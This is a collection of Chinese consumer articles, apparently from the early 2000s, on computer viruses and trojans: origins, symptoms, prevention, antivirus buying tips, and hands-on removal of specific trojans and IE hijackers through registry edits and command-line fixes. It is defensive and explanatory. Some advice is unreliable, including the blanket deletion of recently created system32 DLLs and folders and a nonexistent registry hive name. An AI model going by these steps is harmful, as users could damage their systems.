    病毒的最大特点是具有“主动传染性”，它可以侵入电脑的整个系统，使其受到感染，而每个受感染的程序又可能成为一个病毒，继续将病毒传染给其他程序。一个病毒程序的关键性质在于，它能够传染别的程序，并且具有传递性，这使它有别于同样具有隐蔽性、激发性和攻击性的逻辑炸弹、特洛伊木马等。传染性成为判定一个程序是否为病毒的首要条件。

    说道病毒从何而来，原因有几：

    开玩笑，一个恶作剧。某些爱好计算机并对计算机技术精通的人士为了炫耀自己的高超技术和智慧，凭借对软硬件的深入了解，编制这些特殊的程序。这些程序通过载体传播出去后，在一定条件下被触发。如显示一些动画，播放一段音乐，或提一些智力问答题目等，其目的无非是自我表现一下。这类病毒一般都是良性的，不会有破坏操作。

    产生于个别人的报复心理。每个人都处于社会环境中，但总有人对社会不满或受到不公正的待遇。如果这种情况发生在一个编程高手身上，那么他有可能会编制一些危险的程序。在国外有这样的事例：某公司职员在职期间编制了一段代码隐藏在其公司的系统中，一旦检测到他的名字在工资报表中删除，该程序立即发作，破坏整个系统。类似案例在国内亦出现过。

    用于版权保护。计算机发展初期，由于在法律上对于软件版权保护还没有像今天这样完善。很多商业软件被非法复制，有些开发商为了保护自己的利益制作了一些特殊程序，附在产品中。如：巴基斯坦病毒，其制作者是为了追踪那些非法拷贝他们产品的用户。用于这种目的的病毒目前已不多见。

    用于特殊目的。某组织或个人为达到特殊目的，对政府机构、单位的特殊系统进行宣传或破坏。或用于军事目的。

    还有出于对上司的不满，为了好奇，为了报复，为了祝贺和求爱，为了得到控制口令，为了防止开发了软件拿不到报酬，预留的陷阱等。

    看了上面的原因，该明白了吧，计算机病毒老兄可不是吃素的，不是电脑高手，还揽不起这瓷器活呢！


病毒杂谈及预防知识

《一键清理系统垃圾》

病毒杂谈及预防知识

   什么是病毒，怎样预防及消灭病毒？关于这个话题，众说纷纭。有人说，只要拥有了一套功能强大的杀毒软件便万事大吉；有人说，只要不上网就可抗拒病毒的侵害；还有人认为，只要定期格式化硬盘就能把病毒扼制在萌芽状态……面对种种说法，笔者感到他们把病毒看得太神奇，或者说对病毒的了解不是很清楚，对病毒的预防与剿灭不是很了解。
   认识病毒
   病毒，是指能够破坏计算机系统，影响计算机工作并能实现自我复制的一段程序或指令代码。随着计算机工业的发展，病毒程序层出不穷，到了21世纪的今天它的种类已经达到千万种。虽然病毒的类型有很多，变型的病毒更无法计算，但是就其传染对象来分只不过四类：BIOS、硬盘引导区、操作系统与应用程序病毒。
   在知道了病毒的定义与分类以后，我们再来看看电脑感染了病毒后会出现哪些异常现象：
   BIOS病毒现象
   1、开机运行几秒后突然黑屏
   2、外部设备无法找到
   3、硬盘无法找到
   4、电脑发出异样声音
   硬盘引导区病毒现象
   1、无法正常启动硬盘
   2、引导时出现死机现象
   3、执行C盘时显示“NotreadyerrordriveAAbort，Retry，Fail?”
   操作系统病毒现象
   1、引导系统时间变长
   2、计算机处理速度比以前明显放慢
   3、系统文件出现莫名其妙的丢失，或字节变长，日期修改等现象
   4、系统生成一些特殊的文件
   5、驱动程序被修改使得某些外设不能正常工作
   6、软驱、光驱丢失
   7、计算机经常死机或重新启动
   应用程序病毒现象
   1、启动应用程序出现“非法错误”对话框
   2、应用程序文件变大
   3、应用程序不能被复制、移动、删除
   4、硬盘上出现大量无效文件
   5、某些程序运行时载入时间变长
   预防病毒
   计算机感染病毒后会给我们带来很多不必要的麻烦，因此如何预防病毒是一件刻不容缓的工作。下面笔者将介绍一些预防病毒的措施：
   一、杜绝传染渠道
   病毒的传染无非是两种方式：一是网络，二是软盘与光盘。如今由于电子邮件的盛行，通过互联网传递的病毒要远远高于后者。为此，我们要特别注意在网上的行为。
   1、不要轻易下载小网站的软件与程序。
   2、不要光顾那些很诱惑人的小网站，因为这些网站很有可能就是网络陷阱。
   3、不要随便打开某些来路不明的E-mail与附件程序。
   4、安装正版杀毒软件公司提供的防火墙，比如赛门铁克的个人防火墙软件，并注意时时打开着。
   5、不要在线启动、阅读某些文件，否则您很有可能成为网络病毒的传播者。
   6、经常给自己发封E-mail，看看是否会收到第二封未属标题及附带程序的邮件。
   对于软盘，光盘传染的病毒，我想预防的方法就是不要随便打开程序或安装软件。可以先复制到硬盘上，接着用杀毒软件检查一遍，再执行安装或打开命令。
   二、设置传染对象的属性
   病毒其实是一段程序或指令代码，它主要针对的是以EXE与COM结尾的文件，由于它天生的局限性，因此预防病毒的另一种方法便是设置传染对象的属性，即：把所有以EXE与COM为扩展名的文件设定“只读”。这样一来就算病毒程序被激活，也无法对其他程序进行写操作，也就不能感染可执行程序了，因此病毒的破坏功能受到了很大的限制。
   关于宏病毒
   不夸张地说，几乎所有使用Word的朋友都曾经与宏病毒狭路相逢过。宏病毒的产生主要是因为Word本身配有内置语言，简单地说就是具备编程功能，因此有很多别有用心的人就利用了它的这一功能制作出宏病毒。宏病毒的破坏性虽不大，但对于靠笔杆为生的人的来说确实是一种负担，为此笔者特意借此文告诉大家一些检测、预防宏病毒的方法（清除宏病毒的方法请参看《中国电脑教育报》今年17期49版）。
   一、检测宏病毒
   宏病毒的检测其实非常简单，只要点击Word界面上菜单栏的[工具]→[宏]→[宏]，接着在“宏名”列表中查看是否有AutoExce与AutoOpen两个自动宏便可。
   二、预防宏病毒
   宏病毒通常是驻留在文档或模板的宏中，如果打开这样的文档或模板，就会激活宏病毒，并使病毒进入Normal.dot模板文件中。为此要预防宏病毒，可以采用以下方法：
   1、利用Word本身具有清除宏（病毒）的功能。当Word识别出一个打开的文档中具有自动执行宏时，它会出现一个对话框，让用户选择是否打开宏，为了预防宏病毒一般我们选择[取消宏]按钮。
   2、在Normal.dot模板文件中创建一个自己的宏（AutoExce），具体代码为：
   “SubMain
   DisableAutoMacros1
   EndSub”
   这样就能禁止其他自动宏的运行，预防宏病毒的感染。另外注意一点，此程序是在Word的“工具/宏/VisualBasic编辑器”中完成。
   3、将文件保存为TXT（纯文本文件）或RTF形式（文本文件，但可以包括其他一些非文本文件信息，例如：图片，表格等）。
   其实大可不必对病毒感到非常恐惧，甚至闻风丧胆，因为毕竟创造病毒的还是人不是神，只要大家对病毒有所认识并加以预防，我想它就不会如此嚣张跋扈。另外，现在众多的杀毒软件厂商都为我们提供了功能齐备的软件，比如瑞星2001、江民的KV3000，你要做的仅仅是定期升级、定期查杀即可。但愿此文能给善良的电脑爱好者以帮助，彻底消除病毒带给我们的困扰与烦恼！


不可小视 选购杀毒软件有六大注意

《一键清理系统垃圾》

不可小视 选购杀毒软件有六大注意

   第一，对未知病毒的查杀。计算机病毒的发作周期越来越短，实现对未知病毒的查杀业已成为反毒技术的一个趋势。
   第二，对邮件病毒的查杀。电子邮件在给人带来方便和快捷之时，也成了当今病毒传播的主要工具。对附在邮件中的病毒进行查杀，已经成为杀毒软件的首要任务。时下的杀毒软件中有部分先进的产品已经具备了对邮件病毒查杀的功能，它通过在接收和发送邮件时对邮件进行全面扫描，并通过行为分析来判断邮件中的程序是否是病毒，并能够在监测到病毒后提示用户。最近发现的“求职信”系列变种病毒以及“中国黑客”病毒就是通过邮件监控功能查出来的。
   第三，对内存型病毒的查杀。现在的病毒开始将内存作为自己的栖身之地。而对于计算机特别是服务器而言，内存中的病毒就像一颗定时炸弹，随时会成为系统正常运行的威胁。因此具有内存杀毒功能的杀毒软件，就成了一种有效的杀毒武器。
   第四，对恶意网页的防范。网上冲浪是许多电脑用户都喜欢的时尚，然而，恶意网页的存在使网上冲浪者频频触礁：轻者引起死机黑屏，严重的会破坏微软IE浏览器，导致整个系统运行异常甚至崩溃。恶意网页的危害引起了一些信息安全厂商的重视，很多杀毒软件已建立了恶意网页防范系统，通过对恶意网页的行为、特征进行识别，帮助用户及时发现、抵挡恶意网页的攻击，并自动滤除一些恶意网页的有害代码，使用户放心享受冲浪的乐趣。
   第五，数据拯救系统。对计算机用户而言，电脑中存储的信息是极其重要的。杀毒软件除了要将病毒悉数杀灭，更重要的是一旦电脑遭到病毒破坏，可以扶助用户将数据信息恢复到正常状态。
   《金山毒霸2002》具有金山公司独创的双引擎设计，内置金山自主研发的杀毒引擎和俄罗斯著名杀毒软件Dr.Web的杀毒引擎，融合了启发式搜索、代码分析、虚拟机查毒等经业界证明成熟可靠的反病毒技术，使其在查杀病毒种类、查杀病毒速度、未知病毒防治等多方面达到世界先进水平，同时金山毒霸具有病毒防火墙实时监控、压缩文件查毒、电子邮件、Office、QQ、ICQ嵌入式防护、金山毒霸For IE、硬盘数据修复、Intel P4引擎优化等多项先进的功能。伴随《金山毒霸2002》市场的热销，《金山毒霸2002装机宝典》强势出击。这是一款发布不久的新品，其中包括了金山公司六款优秀的工具类产品：金山毒霸2002、金山网镖2002、金山词霸2002、金山快译2002、金山影霸III、金山游侠III等，基本满足了计算机用户对个人电脑应用的所有工具需求，它在保证电脑信息安全的同时，还使电脑应用多功能化。 “比特动态滤毒”保安全
   《KV3000杀毒王》把重点转移到防杀网络病毒的大方向上来。它不仅在文件监控上实力表现不俗，而且更注重于动态数据监视，把反病毒的发展方向推进到在线监控层面。该软件具有基于网络的“比特动态滤毒”技术的支持，对邮件病毒、恶意网页程序，具有极强的前杀处理能力。产品在互联网与客户终端之间设置了一道严密的数据过滤网，从最底层抵御网络中变化多端的病毒，通过网络传输的任何数据都要经过安全检测，遇网络病毒提前清除，网络病毒无法进入用户硬盘。杀毒王在邮件防毒保护上，因为不必模拟邮件客户端的接受邮件程序，而是完全脱离于邮件客户端之外，所以根本不受邮件客户端的影响，可以适应任何一种邮件客户端。避免了邮件客户端参数变动所带来的不便。在对付恶意网页上，能够提前清除网页里所带的恶意代码与有害程序，防止注册表被修改。


菜鸟除马记

《一键清理系统垃圾》

菜鸟除马记

《中国电脑教育报》豆子

    作为一名菜鸟，我对电脑的安全问题一向不太重视，即使在查看防火墙日志时也不过感叹一声了事，至于为什么每天都有那么多男男女女、老老少少拼命要挤进我的机器里却从未深究。直到有一天，我的同事在她的电脑上接到一条莫名其妙的Message。上面写道：“Hello啊，goodluck到此一游，能不能交个朋友？”同事一看花容失色，病急乱投医，委我以除“马”重任，于是乎上演了一出“菜鸟除‘马’记”。

    因为不知道中的到底是什么木马，我首先打开任务管理器进行了一番侦察，果然在这里看到一个名为Diagcfg的陌生进程，一查原来这个Diagcfg有个官名叫“广外女生”。按照网上所教的清除方法首先在任务管理器中关闭了它的进程，再启动到纯DOS模式下，删除了System目录下的Diagfg.exe。随后找到Windows目录中的注册表编辑器“Regedit.exe”，将它改名为“Regedit.com”。回到Windows模式下，运行Windows目录下的Regedit.com程序找到HKEY_CLASSES_ROOT\exefile\shell\open\command，将其值改为“"%1" %*”就万事大吉了。可我却怎么也打不开这个更名后的注册表，系统不厌其烦地提示“找不到用来打开.com文件的Diagcfg程序”，找不到，就是找不到。

    我愁啊愁，忽然想到打不开扩展名为COM和EXE的文件是不是可以通过修改文件扩展名关联的文件类型来恢复呢？于是重启Windows 2000，按[F8]，选择带命令行的提示的安全模式，这次可以使用命令提示符了。在提示符c：\下输入help，看到下面两条命令：

    ASSOC Displays or modifies file extension associations

    显示或修改文件名扩展关联

    FTYPE Displays or modifies file types used in file extension associations

    显示或者修改在文件名扩展关联中使用的文件类型

    接着在c:\下输入命令ftype |more，找到这样两条语句：

    comfile=c:\winnt\system32\diacfg.exe(大概是这样，有点记不清了）

    exefile=c:\winnt\system32\diacfg.exe

    果然comfile和exefile成了diacfg的傀儡，而实际上正确的语句应该是：

    comfile="%1" %*

     exefile="%1" %*

    终于找到问题的根本了，现在只要将comfile和exefile的路径改回来，就离成功不远了吧？好吧，来看看ASSOC和FTYPE的正确用法。

    C:＼＞help assoc

    显示或修改文件扩展名关联

    ASSOC .ext＝fileType

    .ext 指定跟文件类型关联的文件扩展名

    fileType 指定跟文件扩展名关联的文件类型

    键入 ASSOC 而不带参数，显示当前文件关联。如果只用文件扩展名调用 ASSOC，则显示那个文件扩展名的当前文件关联。如果不为文件类型指定任何参数，命令会删除文件扩展名的关联。

    然后再看看ftype：

    C:＼＞help ftype

    显示或修改用在文件扩展名关联中的文件类型

    FTYPE fileType＝openCommandString

    fileType 指定要检查或改变的文件类型

    openCommandString 指定调用这类文件时要使用的开放式

    键入 FTYPE 而不带参数显示当前有定义的开放式命令字文件类型。 FTYPE 仅用一个文件类型启用时，它显示那个型目前的开放式命令字符串。如果不为开放式命令字符串指FTYPE 命令将删除那个文件类型的开放式命令字符串。在一开放式命令字符串之内，命令字符串 %0 或 %1 被通过关联的文件名所代替。%* 得到所有的参数，%2 得到第一个参数%3 得到第二个，等等。 %~n 得到其余所有以 nth 参数打头参数；n 可以是从 2 到 9 的数字。例如:

    ASSOC .pl=PerlScript

    FTYPE PerlScript=perl.exe %1 %*

    看明白这两个命令的用法后，就该动手操作了。

    C:＼＞assoc .exe＝exefile

    系统提示：exe＝exefile

    C:＼＞ftype exefile＝″％1″ ％

    系统提示：exefile＝″％1″ ％］

    再ftype一下，comfile和exefile已经修改成功。重启系统，试着点击Regedit.com，呵呵，注册表大人终于跳了出来，EXE文件也死而复生了，删除掉注册表中Diagcfg的相关项，菜鸟激动地向MM宣布：“木马被本帅驱逐出境了”。

    然而我高兴得太早了，还没等我合上嘴巴，另一种木马灰鸽子又堂而皇之地窜了进来， 并且明目张胆地盘踞在启动栏上，做翘首盼望状。

    菜鸟痛哭着进入注册表，依次打开HKEY_LOCAL_MACHINE、SOFTWARE、WINDOWS CURRENTVERSION，只见Run和Runservices均有HGZ的魔影，路径是c:\winnt\system32\HGServer.exe。

    根据经验，菜鸟依葫芦画瓢首先到任务管理器中关闭了灰鸽子的进程，然后进入DOS状态下。执行del hgserver.exe，哪知系统一点儿情面不给，提示“找不到c:\winnt\system32\hgserver.exe”，用dir hgserver.exe查看，同样提示“找不到文件”。看来修改了文件的属性，只好一不做，二不休，干脆来个attrib -r -a -s -h hgserver.exe ，这回再del hgserver.exe，总算提示删除成功了。随后赶紧修改注册表，关闭了一些不必要的服务和端口，又急急忙忙装了个防火墙，这才松了一口气。

    值得庆幸的是，幸亏这次遇到的黑客好像也是菜鸟级的，不然以我菜鸟级的功力怎么能抵挡得住？今后再也不能掉以轻心了。


[转帖]查看开放端口判断木马

《一键清理系统垃圾》

[转帖]查看开放端口判断木马

当前最为常见的木马通常是基于TCP/UDP协议进行client端与server端之间的通讯的，
既然利用到这两个协议，就不可避免要在server端（就是被种了木马的机器了）打开监
听端口来等待连接。例如鼎鼎大名的冰河使用的监听端口是7626，Back Orifice 2000
则是使用54320等等。那么，我们可以利用查看本机开放端口的方法来检查自己是否被
种了木马或其它黑客程序。以下是详细方法介绍。
1． Windows本身自带的netstat命令
关于netstat命令，我们先来看看windows帮助文件中的介绍：

Netstat
显示协议统计和当前的 TCP/IP 网络连接。该命令只有在安装了 TCP/IP 协议后才可以
使用。

netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval]

参数
-a
显示所有连接和侦听端口。服务器连接通常不显示。
-e
显示以太网统计。该参数可以与 -s 选项结合使用。
-n
以数字格式显示地址和端口号（而不是尝试查找名称）。
-s
显示每个协议的统计。默认情况下，显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可
以用来指定默认的子集。
-p protocol
显示由 protocol 指定的协议的连接；protocol 可以是 tcp 或 udp。如果与 -s 选项
一同使用显示每个协议的统计，protocol 可以是 tcp、udp、icmp 或 ip。
-r
显示路由表的内容。
interval
重新显示所选的统计，在每次显示之间暂停 interval 秒。按 CTRL+B 停止重新显示统
计。如果省略该参数，netstat 将打印一次当前的配置信息。

好了，看完这些帮助文件，我们应该明白netstat命令的使用方法了。现在就让我们现
学现用，用这个命令看一下自己的机器开放的端口。进入到命令行下，使用netstat命
令的a和n两个参数：
C:\>netstat -an
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:21 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7626 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 0.0.0.0:0
UDP 0.0.0.0:1046 0.0.0.0:0
UDP 0.0.0.0:1047 0.0.0.0:0

解释一下，Active Connections是指当前本机活动连接，Proto是指连接使用的协议名
称，Local Address是本地计算机的 IP 地址和连接正在使用的端口号，Foreign
Address是连接该端口的远程计算机的 IP 地址和端口号，State则是表明TCP 连接的状
态，你可以看到后面三行的监听端口是UDP协议的，所以没有State表示的状态。看！我
的机器的7626端口已经开放，正在监听等待连接，像这样的情况极有可能是已经感染了
冰河！急忙断开网络，用杀毒软件查杀病毒是正确的做法。
2．工作在windows2000下的命令行工具fport

使用windows2000的朋友要比使用windows9X的幸运一些，因为可以使用fport这个程序
来显示本机开放端口与进程的对应关系。
Fport是FoundStone出品的一个用来列出系统中所有打开的TCP/IP和UDP端口，以及它们
对应应用程序的完整路径、PID标识、进程名称等信息的软件。在命令行下使用，请看
例子：
D:\>fport.exe
FPort v1.33 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid Process Port Proto Path
748 tcpsvcs -> 7 TCP C:\WINNT\System32\ tcpsvcs.exe
748 tcpsvcs -> 9 TCP C:\WINNT\System32\tcpsvcs.exe
748 tcpsvcs -> 19 TCP C:\WINNT\System32\tcpsvcs.exe
416 svchost -> 135 TCP C:\WINNT\system32\svchost.exe

是不是一目了然了。这下，各个端口究竟是什么程序打开的就都在你眼皮底下了。如果
发现有某个可疑程序打开了某个可疑端口，可千万不要大意哦，也许那就是一只狡猾的
木马！
Fport的最新版本是2.0。在很多网站都提供下载，但是为了安全起见，当然最好还是到
它的老家去下：http://www.foundstone.com/knowledge/zips/fport.zip
3.与Fport功能类似的图形化界面工具Active Ports

Active Ports为SmartLine出品，你可以用来监视电脑所有打开的TCP/IP/UDP端口，不
但可以将你所有的端口显示出来，还显示所有端口所对应的程序所在的路径，本地IP和
远端IP(试图连接你的电脑IP)是否正在活动。

更棒的是，它还提供了一个关闭端口的功能，在你用它发现木马开放的端口时，可以立
即将端口关闭。这个软件工作在Windows NT/2000/XP平台下。你可以在
http://www.smartline.ru/software/aports.zip得到它。
其实使用windows xp的用户无须借助其它软件即可以得到端口与进程的对应关系，因为
windows xp所带的netstat命令比以前的版本多了一个O参数，使用这个参数就可以得出
端口与进程的对应来。
上面介绍了几种查看本机开放端口，以及端口和进程对应关系的方法，通过这些方法可
以轻松的发现基于TCP/UDP协议的木马，希望能给你的爱机带来帮助。但是对木马重在
防范，而且如果碰上反弹端口木马，利用驱动程序及动态链接库技术制作的新木马时，
以上这些方法就很难查出木马的痕迹了。所以我们一定要养成良好的上网习惯，不要随
意运行邮件中的附件，安装一套杀毒软件。


彻底清除IE内部顽固病毒

《一键清理系统垃圾》

彻底清除IE内部顽固病毒

    现今的杀毒工具虽然有的门类众多，五花八门，但是还是很多都不能完全解决各种顽固病毒。真是道高一尺，魔高一丈。有时候用了很多杀毒工具都无法根除病毒，特别是各种IE病毒，恶意代码，更是让许多网民防不胜防，打开IE时冷不防的蹦出个广告网站窗口?IE被篡改?重启后还被篡改?系统资源被严重损耗?这些都是非常普遍的IE病毒的表现形式。而且现在很多病毒都是被网络不法分子和广告宣传公司造出来的。杀毒工具根本来不及更新，等杀毒工具更新了，你的电脑基本也都瘫痪了。

    这种情况下，有时候不得不重装系统。笔者有一次在写论文的时候太急，杀毒工具都用了N个，还是不能杀干净，于是索性重装系统。付出的代价也是惨痛的。难道出问题了都要重装系统吗?不用!现在笔者教你如何在杀毒工具都无法清除的情况来手工杀除那些顽固的IE病毒。万事不求人，应对各种突发病毒和新病毒都药到病除!你不需要是杀毒专家，这些，其实很简单。请看以下手工杀毒必杀技三招秘籍。

    一、第一招之初步防御:预备阶段

    这一阶段，我还是建议大家首先试一下各种杀毒工具，把基本的能杀的病毒都给先杀了，以减轻自己的工作量。比如IE病毒专杀工具如3721雅虎助手(可查杀大部分IE病毒和恢复浏览器)，反间谍专家，以及金山毒霸，瑞星，江民等常见杀毒工具。你需要在预备阶段做的工作就是利用一些杀度工具把常见的大部分病毒都给杀除了。另外，如果不能杀除，你可以再尝试在系统启动时按F8进入安全模式在这个情况下再启动杀毒工具和IE修复工具进行查杀。当然，有些人造新病毒还是可以躲过这一关的。那么就用下一招。

    二、第二招之反击病毒:扫描进程进行查杀

    笔者的电脑就曾经CPU狂转滚烫无比，发现RUNDLL32.EXE这个文件运行了99%的CPU资源，而这个文件是WINDOWS下的SYSTEM32文件夹里的，不应该是病毒。而最大的可能，它就是被用来运行了某些病毒的DLL文件。而造成严重损害的。针对进程问题，首先大家可以用最简单的方法先进行表面清楚，就是在“开始”里点“运行”，键入MSCONFIG，然后进入启动项设置，看到不正常的启动项，比如各种莫名奇妙的名字，以及特别是在非WINDOWS系统文件夹下的(可以直接删除都没事)，以及各种奇怪的可执行文件，.exe的，给予坚决取消启动。并可找到那个文件的位置，给予删除，如果非系统文件夹下的，你大可以放心删除。另外，推荐大家一款免费的进程扫描工具hijackthis,大家可以找它的汉化版的，用来扫描进程，你根据扫描进程文件，可以一一排除，哪些是正常的文件，正常的文件旁一般都有注释。

    当然，当你看到某些异常文件，尤其是隐藏在SYSTEM32文件夹下的，某些异常的.exe文件，以及它的上级文件夹。不要怕，进入c:/windows/system32, 进去之后，找到那个文件，以及它的父文件夹。有时候，你会很惊讶的发现，这个可执行文件病毒就被你发现了，有的病毒执行程序，你查看属性时，竟然写到是某某广告公司，我记得很清楚的就有什么傲视广告公司，真是垃圾公司造一些垃圾广告病毒来害人!这些病毒往往都是一个单的可执行文件，放在SYSTEM32下或者一个文件夹里。先别管它，好在这些病毒还写了是谁造的，还等什么，马上彻底删除!有的无法删除，正在运行的，你要借助一些文件粉碎机来删除。而好象SP2的WINXP自带粉碎文件功能。就这样，你根据可疑进程，特别是扩展名为.exe的文件，找到它隐藏的文件夹，看它的属性和修改日期，有的是往往是发生病毒情况的那一天的，很容易就发现它是病毒，直接封杀!有的更“牛”一点，在父文件夹里还带着一些广告网站的.ini 文本文件和其它文件夹，这个没事，你打开看看那些文件夹里都是啥，有时候你能发现这些.ini 文件里就写着骚扰你的恶意网站或者其它广告网站的地址。发现了就好，然后再看看这个文件夹的修改时间，如果是发生病毒时候的，还等什么?整个这个异常文件夹一下子删除!就这样，你可以通过进程扫描，寻根求底的方法，找到隐藏的系统文件下，通过查阅文件夹以及异常文件属性等，直接手工删除!
·三招必杀技 彻底清除IE内部顽固病毒（2）
    三、第三招之主动出击:根除残留病毒

    有时候，某些病毒并不是在运行，而是在你打开IE之后的某个时间或者激发了某些事件，它们才会运行。有的还是某些.DLL 文件，隐藏在系统文件夹下，很难发现，而且往往误认为是系统文件而不敢查杀。这些成为最顽固的病毒，不用怕。这些也都可以通过第三招而杀除。最常用的方法是根据文件夹和文件修改创建时间。首先你把文件夹属性调整为查阅所有文件，包括隐藏文件和系统文件。然后右健，再通过查看文件方式选择为查看详细信息，则会出现详细信息列表，你可以通过选择最近时间排列，而看到最新创建的一些文件夹和一些文件。如果你记得你病毒发作的那第一天时间，直接可以发现那些异常文件夹的创建时间和病毒发作时大概相同，直接进去查看，有时候往往发现这些文件夹里果然包含着广告网站的信息等或者其它异常内容。不管有没有，直接删除这些文件夹吧!有的如果是你最近装过的软件的话，你自己也会清楚，如果不是的，那就是病毒创建的文件夹了。删除这些新创建的对你系统运行也没有损失。

    大可以不必担心。统统删!另外，如果发现新近建的尤其是病毒发作那一天创建的.dll文件(我记得有个就叫什么std.dll,stdup.dll,spoolsv.dll等),以及其它异常.exe文件，不管有没有在以前的进程中发现的，发现的，更是有把握的删，没在进程中发现的，也可以不犹豫的删除，因为这些新建立的文件，是不会影响系统运行的。另外，这是主动到某个文件夹里看，当然，你可以通过更智能的方法，用WINDOWS搜索来查找最近修改的文件，这样，再一个个去分析去删除。这些方法，是手工杀毒三招中的最高境界。新创立的文件，你自己建立的，不用管它，不是你自己建立的，或者也不是最近装的某软件的。那些就很可能是病毒了。特别是病毒发作那第一天的，极大的可能性就是病毒。为了安全，直接删除!

    通过以上三种方法，我最近又通过手工杀除了许多顽固的新的IE病毒。避免了重装系统。其实，自己手工杀毒，乐在其中。其实杀毒也是那么简单。另外，奉劝大家以后上网不要随便安装控件，也不要随便下载和乱点击。查阅资料等尽量去大网站而不要去小网站。另外设置WINDOWS防火墙，安装病毒防火墙，隔段时间用杀毒工具进行病毒查杀。如果再出现问题，就用我的那三招吧!


电脑病毒有哪几种类型

《一键清理系统垃圾》

电脑病毒有哪几种类型

   计算机病毒的“作案”方式五花八门，按照危害程度的不同，可分为以下几种类型：
   暗藏型病毒：该病毒进入计算机后能够潜伏下来，到预定时间或特定事件发生时，再出来为非作歹。
   杀手型病毒：也叫暗杀型病毒，钻入机器后，专门用来篡改和毁伤某一个或某一组特定的文件、数据，不留任何痕迹。
   霸道型病毒：该病毒能够中断整个计算机的工作，迫使信息系统瘫痪。
   超载型病毒：该病毒进入计算机后能大量复制和繁殖，抢占内存和硬盘空间，使机器因超载而无法工作。
   间谍型病毒：该病毒能从计算机中寻找特定信息和数据，并将其发送到指定地点，借此窃取情报。
   强制隔离型病毒：该病毒主要用来破坏电脑网络系统的整体功能，使各个子系统与控制中心以及各子系统间相互隔离，进而造成整个系统肢解瘫痪。
   欺骗型病毒：该病毒能打入系统内部，对系统程序进行删改或给敌方系统注入假情报，造成其决策失误。
   干扰型病毒：该病毒通过对计算机系统或工作环境进行干扰和破坏，达到消耗系统资源、降低处理速度、干扰系统运行、破坏计算机各种文件和数据的目的，从而使其不能正常工作。


恶意病毒“四大家族”

《一键清理系统垃圾》

恶意病毒“四大家族”

一、宏病毒
   由于微软的Office系列办公软件和Windows系统占了绝大多数的PC软件市场，加上Windows和Office提供了宏病毒编制和运行所必需的库（以 VB库为主）支持和传播机会，所以宏病毒是最容易编制和流传的病毒之一，很有代表性。
   宏病毒发作方式: 在Word打开病毒文档时，宏会接管计算机，然后将自己感染到其他文档，或直接删除文件等等。Word将宏和其他样式储存在模板中，因此病毒总是把文档转换成模板再储存它们的宏。这样的结果是某些Word版本会强迫你将感染的文档储存在模板中。
   判断是否被感染: 宏病毒一般在发作的时候没有特别的迹象，通常是会伪装成其他的对话框让你确认。在感染了宏病毒的机器上，会出现不能打印文件、Office文档无法保存或另存为等情况。
   宏病毒带来的破坏:删除硬盘上的文件;将私人文件复制到公开场合;从硬盘上发送文件到指定的E-mail、FTP地址。
   防范措施:平时最好不要几个人共用一个Office程序，要加载实时的病毒防护功能。病毒的变种可以附带在邮件的附件里，在用户打开邮件或预览邮件的时候执行，应该留意。一般的杀毒软件都可以清除宏病毒。
二、CIH病毒
   CIH是本世纪最著名和最有破坏力的病毒之一，它是第一个能破坏硬件的病毒。
   发作破坏方式:主要是通过篡改主板BIOS里的数据，造成电脑开机就黑屏，从而让用户无法进行任何数据抢救和杀毒的操作。CIH的变种能在网络上通过捆绑其他程序或是邮件附件传播，并且常常删除硬盘上的文件及破坏硬盘的分区表。所以CIH 发作以后，即使换了主板或其他电脑引导系统，如果没有正确的分区表备份，染毒的硬盘上特别是其C分区的数据挽回的机会很少。
   防范措施:已经有很多CIH免疫程序诞生了，包括病毒制作者本人写的免疫程序。一般运行了免疫程序就可以不怕CIH了。如果已经中毒，但尚未发作，记得先备份硬盘分区表和引导区数据再进行查杀，以免杀毒失败造成硬盘无法自举。
三、蠕虫病毒
   蠕虫病毒以尽量多复制自身（像虫子一样大量繁殖）而得名，多感染电脑和占用系统、网络资源，造成PC和服务器负荷过重而死机，并以使系统内数据混乱为主要的破坏方式。它不一定马上删除你的数据让你发现，比如著名的爱虫病毒和尼姆达病毒。关于蠕虫病毒的识别判断及防范措施将在下面的文章中详细介绍。
四、木马病毒
   木马病毒源自古希腊特洛伊战争中著名的“木马计”而得名，顾名思义就是一种伪装潜伏的网络病毒，等待时机成熟就出来害人。
   传染方式:通过电子邮件附件发出;捆绑在其他的程序中。
   病毒特性:会修改注册表、驻留内存、在系统中安装后门程序、开机加载附带的木马。
   木马病毒的破坏性:木马病毒的发作要在用户的机器里运行客户端程序，一旦发作，就可设置后门，定时地发送该用户的隐私到木马程序指定的地址，一般同时内置可进入该用户电脑的端口，并可任意控制此计算机，进行文件删除、拷贝、改密码等非法操作。
   防范措施:用户提高警惕，不下载和运行来历不明的程序，对于不明来历的邮件附件也不要随意打开。


恶意网页病毒十三大症状分析及简单修复方法

《一键清理系统垃圾》

恶意网页病毒十三大症状分析及简单修复方法

恶意网页病毒十三大症状分析及简单修复方法

一、对IE浏览器产生破坏的网页病毒：

    （一）.默认主页被修改

    1.破坏特性：默认主页被自动改为某网站的网址。

    2.表现形式：浏览器的默认主页被自动设为如********.COM的网址。

    3.清除方法：采用手动修改注册表法，开始菜单－>运行－>regedit->确定，打开注册表编辑工具，按顺序依次打开：HKEY_LOCAL_USER\Software\Microsoft\Internet Explorer\Main　分支，找到Default_Page_URL键值名(用来设置默认主页)，在右窗口点击右键进行修改即可。按F5键刷新生效。

    危害程度：一般

    （二）.默认首页被修改

    1.破坏特性：默认首页被自动改为某网站的网址。

    2.表现形式：浏览器的默认主页被自动设为如********.COM的网址。

    3.清除方法：采用手动修改注册表法，开始菜单－>运行－>regedit->确定，打开注册表编辑工具，按如下顺序依次打开：HKEY_LOCAL_USER\Software\Microsoft\Internet Explorer\Main分支，找到StartPage键值名(用来设置默认首页)，在右窗口点击右键进行修改即可。按F5键刷新生效。

    危害程度：一般

    （三）.默认的微软主页被修改

    1.破坏特性：默认微软主页被自动改为某网站的网址。

    2.表现形式：默认微软主页被篡改。

    3.清除方法：

